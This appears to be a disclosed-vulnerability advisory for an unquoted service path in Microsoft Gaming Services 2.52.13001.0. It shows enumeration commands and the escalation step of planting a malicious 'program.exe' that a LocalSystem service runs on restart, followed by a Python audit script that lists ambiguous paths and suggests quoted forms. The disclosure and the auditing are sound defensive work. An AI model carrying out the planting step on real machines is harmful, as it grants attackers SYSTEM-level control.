Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path

# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
# Discovery by: Johto Robbie
# Discovery Date: May 12, 2021
# Tested Version: 2.52.13001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 Home

# Steps to discover Unquoted Service Path:

Go to Start and type cmd. Enter the following command and press Enter:

C:\Users\Bang's>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """

Gaming Services    GamingServices       C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe       Auto
Gaming Services    GamingServicesNet    C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe    Auto

C:\Users\Bang's>sc qc "GamingServices"

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GamingServices
        TYPE               : 210  WIN32_PACKAGED_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Gaming Services
        DEPENDENCIES       : staterepository
        SERVICE_START_NAME : LocalSystem

The service path is not quoted, and it is located under C:\Program Files. Put
a malicious application with the name "program.exe".

Stop & Start: GamingServices. "program.exe" will be executed.

#Exploit:

An unquoted service path in
Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe could lead to
privilege escalation during the installation process that is performed when
an executable file is registered. This could further lead to complete
compromise of confidentiality, integrity and availability.

#Timeline
May 12, 2021 - Reported to Microsoft
Feb 11, 2022 - Confirmed vulnerability has been fixed
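
For auditing a host for the same class of misconfiguration, the sketch below (an added example, not part of the original advisory or of Microsoft's code) takes service ImagePath strings, lists the earlier file names Windows would try before the intended binary, and gives the quoted form. Only the GamingServices path comes from the page; the other sample services and all function names are assumptions made for illustration.

```python
import re

# Constructed sample ImagePath values. Only the first comes from the page;
# the other three are hypothetical services added for contrast.
SAMPLE = [
    ("GamingServices", r"C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe"),
    ("VendorSvc", r"C:\Program Files\Vendor App\svc.exe -k run"),
    ("QuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" -k run'),
    ("NoSpaceSvc", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

# Executable part = shortest prefix ending in ".exe" followed by whitespace or end.
_EXE = re.compile(r"(.+?\.exe)(?=\s|$)(.*)", re.IGNORECASE)

def audit_image_path(image_path):
    """Return (ambiguous_prefixes, quoted_form) for one service ImagePath.

    ambiguous_prefixes are the file names Windows tries before the intended
    binary when the path is unquoted; an empty list means no ambiguity.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return [], path                      # already quoted
    m = _EXE.match(path)
    if not m:
        return [], path                      # not an .exe path, out of scope here
    exe, args = m.group(1), m.group(2)
    # Every space inside the executable path is a point where parsing can stop early.
    prefixes = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    if not prefixes:
        return [], path                      # no space, nothing to misparse
    return prefixes, f'"{exe}"{args}'

def audit(services):
    """Return {service name: (prefixes, quoted_form)} for ambiguous entries only."""
    findings = {}
    for name, image_path in services:
        prefixes, fix = audit_image_path(image_path)
        if prefixes:
            findings[name] = (prefixes, fix)
    return findings

if __name__ == "__main__":
    for name, (prefixes, fix) in audit(SAMPLE).items():
        print(f"{name}: unquoted path with spaces")
        for p in prefixes:
            print(f"  verify absent and not writable by non-admins: {p}")
        print(f"  quoted form: {fix}")
```

On a real host the input would come from the `sc qc` or `wmic service get` output shown above rather than from the embedded sample.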
            
